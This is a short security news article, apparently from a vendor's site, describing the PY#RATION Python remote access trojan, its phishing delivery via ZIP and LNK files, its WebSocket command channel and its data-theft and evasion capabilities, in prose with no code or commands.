HQ/EMEAFind out how we can help your business
Threat actors have used a new Python-based malware dubbed PY#RATION RAT to take over and steal from targets since August last year. Based on reports, the RAT has multiple abilities that enable its operators to harvest sensitive information.
This remote access trojan could transfer files from the compromised host to an attacker-controlled command-and-control server. The RAT uses WebSockets to bypass security defences, data exfiltration, and C2 communication.
It could also capture clipboard data, record keystrokes, scan AV solutions, and run system commands. Furthermore, PY#RATION RAT could extract saved cookies and passwords from web browsers.
PY#RATION is a route for launching additional malware strains, like a Python-based information stealer designed by attackers to steal data from web browsers and crypto wallets.
The PY#RATION RAT has a couple of versions, one of which could bypass security detections.
Investigations revealed that the PY#RATION RAT has versions 1.0 and 1.6. The second version features anti-detection tactics.
The RAT operators initiate their attacks through phishing emails with an attached ZIP file that contains two shortcut archives. These files spoof the images of a UK driver’s license that seems to be legitimate.
The nature of the phishing baits implies that the intended targets of the attackers could hail from the United Kingdom or North America.
Once a target opens the LNK files, they will receive a couple of text files from a remote server renamed to BAT files. Subsequently, it will run in the background while a decoy image is shown to distract the target.
In addition, another set of scripts is downloaded by the actors from a command-and-control server. These scripts are created to acquire additional payloads from the server, like the Python binary.
The threat actors could also use virtual assistance to pass the malware as a system file.
Attackers create this newly discovered malware via Python. Hence, it could target operating systems such as macOS, Windows, and Linux. The RAT could also utilise several methods, such as fernet encryption, to bypass AV solutions.
These abilities could make this new RAT a severe threat to different users worldwide.
